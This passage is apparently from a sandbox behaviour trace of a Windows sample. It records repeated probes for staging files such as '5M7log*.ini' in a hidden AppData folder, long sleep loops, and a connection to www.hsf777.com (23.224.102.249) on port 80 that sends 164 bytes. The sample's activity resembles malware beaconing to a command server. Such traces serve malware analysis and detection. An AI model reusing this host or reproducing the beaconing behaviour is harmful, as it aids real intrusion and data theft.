DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtPathName=0x1302fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.355] NtCreateFile (in: FileHandle=0x1302fac0, DesiredAccess=0x120089, ObjectAttributes=0x1302fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7log00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fac0*=0xffffffffffffffff, IoStatusBlock=0x1302fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0201.356] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa40 | out: HeapArray=0x1302fa40*=0x5c0000) returned 0x6 [0201.356] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0201.356] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.356] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0201.356] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0201.356] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0201.356] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.356] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0201.356] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0201.357] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f76b0) returned 1 [0201.357] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.357] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0201.357] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0201.357] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0201.357] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.357] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0201.359] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0201.359] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0201.359] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.359] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0201.359] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0201.359] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0201.359] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.359] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0201.359] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0201.359] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0201.360] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.360] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0201.360] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0201.360] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0201.360] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.360] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0201.360] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0201.360] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0201.360] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.360] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0201.360] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0201.360] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0201.360] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtPathName=0x1302fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.361] NtCreateFile (in: FileHandle=0x1302fa50, DesiredAccess=0x120089, ObjectAttributes=0x1302fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa50*=0xffffffffffffffff, IoStatusBlock=0x1302fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0201.361] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302f9d0 | out: HeapArray=0x1302f9d0*=0x5c0000) returned 0x6 [0201.361] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0201.361] Sleep (dwMilliseconds=0x7d0) [0201.363] Sleep (dwMilliseconds=0x7d0) [0201.365] Sleep (dwMilliseconds=0x7d0) [0201.366] Sleep (dwMilliseconds=0x7d0) [0201.368] Sleep (dwMilliseconds=0x7d0) [0201.371] Sleep (dwMilliseconds=0x7d0) [0201.373] Sleep (dwMilliseconds=0x7d0) [0201.377] Sleep (dwMilliseconds=0x7d0) [0201.378] Sleep (dwMilliseconds=0x7d0) [0201.380] Sleep (dwMilliseconds=0x7d0) [0201.381] Sleep (dwMilliseconds=0x7d0) [0201.383] Sleep (dwMilliseconds=0x7d0) [0201.384] Sleep (dwMilliseconds=0x7d0) [0201.386] Sleep (dwMilliseconds=0x7d0) [0201.387] Sleep (dwMilliseconds=0x7d0) [0201.389] Sleep (dwMilliseconds=0x7d0) [0201.390] Sleep (dwMilliseconds=0x7d0) [0201.393] Sleep (dwMilliseconds=0x7d0) [0201.394] Sleep (dwMilliseconds=0x7d0) [0201.396] Sleep (dwMilliseconds=0x7d0) [0201.398] Sleep (dwMilliseconds=0x7d0) [0201.399] Sleep (dwMilliseconds=0x7d0) [0201.401] Sleep (dwMilliseconds=0x7d0) [0201.403] Sleep (dwMilliseconds=0x7d0) [0201.404] Sleep (dwMilliseconds=0x7d0) [0201.406] Sleep (dwMilliseconds=0x7d0) [0201.407] Sleep (dwMilliseconds=0x7d0) [0201.409] Sleep (dwMilliseconds=0x7d0) [0201.410] Sleep (dwMilliseconds=0x7d0) [0201.412] Sleep (dwMilliseconds=0x7d0) [0201.413] Sleep (dwMilliseconds=0x7d0) [0201.415] Sleep (dwMilliseconds=0x7d0) [0201.416] Sleep (dwMilliseconds=0x7d0) [0201.418] Sleep (dwMilliseconds=0x7d0) [0201.419] Sleep (dwMilliseconds=0x7d0) [0201.421] Sleep (dwMilliseconds=0x7d0) [0201.422] Sleep (dwMilliseconds=0x7d0) [0201.424] Sleep (dwMilliseconds=0x7d0) [0201.426] Sleep (dwMilliseconds=0x7d0) [0201.427] Sleep (dwMilliseconds=0x7d0) [0201.429] Sleep (dwMilliseconds=0x7d0) [0201.430] Sleep (dwMilliseconds=0x7d0) [0201.432] Sleep (dwMilliseconds=0x7d0) [0201.433] Sleep (dwMilliseconds=0x7d0) [0201.435] Sleep (dwMilliseconds=0x7d0) [0201.436] Sleep (dwMilliseconds=0x7d0) [0201.438] Sleep (dwMilliseconds=0x7d0) [0201.439] Sleep (dwMilliseconds=0x7d0) [0201.441] Sleep (dwMilliseconds=0x7d0) [0201.442] Sleep (dwMilliseconds=0x7d0) [0201.444] Sleep (dwMilliseconds=0x7d0) [0201.445] Sleep (dwMilliseconds=0x7d0) [0201.447] Sleep (dwMilliseconds=0x7d0) [0201.448] Sleep (dwMilliseconds=0x7d0) [0201.450] Sleep (dwMilliseconds=0x7d0) [0201.452] Sleep (dwMilliseconds=0x7d0) [0201.453] Sleep (dwMilliseconds=0x7d0) [0201.455] Sleep (dwMilliseconds=0x7d0) [0201.457] Sleep (dwMilliseconds=0x7d0) [0201.459] Sleep (dwMilliseconds=0x7d0) [0201.461] Sleep (dwMilliseconds=0x7d0) [0201.463] Sleep (dwMilliseconds=0x7d0) [0201.464] Sleep (dwMilliseconds=0x7d0) [0201.465] Sleep (dwMilliseconds=0x7d0) [0201.467] Sleep (dwMilliseconds=0x7d0) [0201.469] Sleep (dwMilliseconds=0x7d0) [0201.470] Sleep (dwMilliseconds=0x7d0) [0201.472] Sleep (dwMilliseconds=0x7d0) [0201.473] Sleep (dwMilliseconds=0x7d0) [0201.475] Sleep (dwMilliseconds=0x7d0) [0201.476] Sleep (dwMilliseconds=0x7d0) [0201.478] Sleep (dwMilliseconds=0x7d0) [0201.480] Sleep (dwMilliseconds=0x7d0) [0201.482] Sleep (dwMilliseconds=0x7d0) [0201.483] Sleep (dwMilliseconds=0x7d0) [0201.505] Sleep (dwMilliseconds=0x7d0) [0201.507] Sleep (dwMilliseconds=0x7d0) [0201.509] Sleep (dwMilliseconds=0x7d0) [0201.510] Sleep (dwMilliseconds=0x7d0) [0201.512] Sleep (dwMilliseconds=0x7d0) [0201.513] Sleep (dwMilliseconds=0x7d0) [0201.515] Sleep (dwMilliseconds=0x7d0) [0201.516] Sleep (dwMilliseconds=0x7d0) [0201.518] Sleep (dwMilliseconds=0x7d0) [0201.520] Sleep (dwMilliseconds=0x7d0) [0201.521] Sleep (dwMilliseconds=0x7d0) [0201.523] Sleep (dwMilliseconds=0x7d0) [0201.526] Sleep (dwMilliseconds=0x7d0) [0201.527] Sleep (dwMilliseconds=0x7d0) [0201.528] Sleep (dwMilliseconds=0x7d0) [0201.530] Sleep (dwMilliseconds=0x7d0) [0201.532] Sleep (dwMilliseconds=0x7d0) [0201.534] Sleep (dwMilliseconds=0x7d0) [0201.536] Sleep (dwMilliseconds=0x7d0) [0201.537] Sleep (dwMilliseconds=0x7d0) [0201.539] Sleep (dwMilliseconds=0x7d0) [0201.540] Sleep (dwMilliseconds=0x7d0) [0201.542] Sleep (dwMilliseconds=0x7d0) [0201.543] Sleep (dwMilliseconds=0x7d0) [0201.545] Sleep (dwMilliseconds=0x7d0) [0201.546] Sleep (dwMilliseconds=0x7d0) [0201.548] Sleep (dwMilliseconds=0x7d0) [0201.551] Sleep (dwMilliseconds=0x7d0) [0201.552] Sleep (dwMilliseconds=0x7d0) [0201.554] Sleep (dwMilliseconds=0x7d0) [0201.555] Sleep (dwMilliseconds=0x7d0) [0201.557] Sleep (dwMilliseconds=0x7d0) [0201.558] Sleep (dwMilliseconds=0x7d0) [0201.560] Sleep (dwMilliseconds=0x7d0) [0201.561] Sleep (dwMilliseconds=0x7d0) [0201.563] Sleep (dwMilliseconds=0x7d0) [0201.564] Sleep (dwMilliseconds=0x7d0) [0201.565] Sleep (dwMilliseconds=0x7d0) [0201.568] Sleep (dwMilliseconds=0x7d0) [0201.570] Sleep (dwMilliseconds=0x7d0) [0201.571] socket (af=2, type=1, protocol=6) returned 0x1980 [0201.571] getaddrinfo (in: pNodeName="www.hsf777.com", pServiceName="80", pHints=0x9e772f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x9e77328 | out: ppResult=0x9e77328*=0xa05ec50*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x9f94930*(sa_family=2, sin_port=0x50, sin_addr="23.224.102.249"), ai_next=0x0)) returned 0 [0201.601] connect (s=0x1980, name=0x9f94930*(sa_family=2, sin_port=0x50, sin_addr="23.224.102.249"), namelen=16) returned 0 [0201.759] send (s=0x1980, buf=0x82e10fa*, len=164, flags=0) returned 164 [0201.760] setsockopt (s=0x1980, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0201.760] recv (in: s=0x1980, buf=0x127cf040, len=2048000, flags=0 | out: buf=0x127cf040) returned 0 [0201.931] closesocket (s=0x1980) returned 0 [0201.932] Sleep (dwMilliseconds=0x7d0) [0201.933] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtPathName=0x1302fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.933] NtCreateFile (in: FileHandle=0x1302fac0, DesiredAccess=0x120089, ObjectAttributes=0x1302fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7log00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fac0*=0xffffffffffffffff, IoStatusBlock=0x1302fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0201.934] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa40 | out: HeapArray=0x1302fa40*=0x5c0000) returned 0x6 [0201.934] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f7860) returned 1 [0201.934] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.934] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0201.934] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0201.934] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0201.934] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.934] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0201.934] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0201.934] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0201.934] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.934] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0201.934] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0201.934] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0201.935] RtlDosPathNameToNtPathName_U (in: 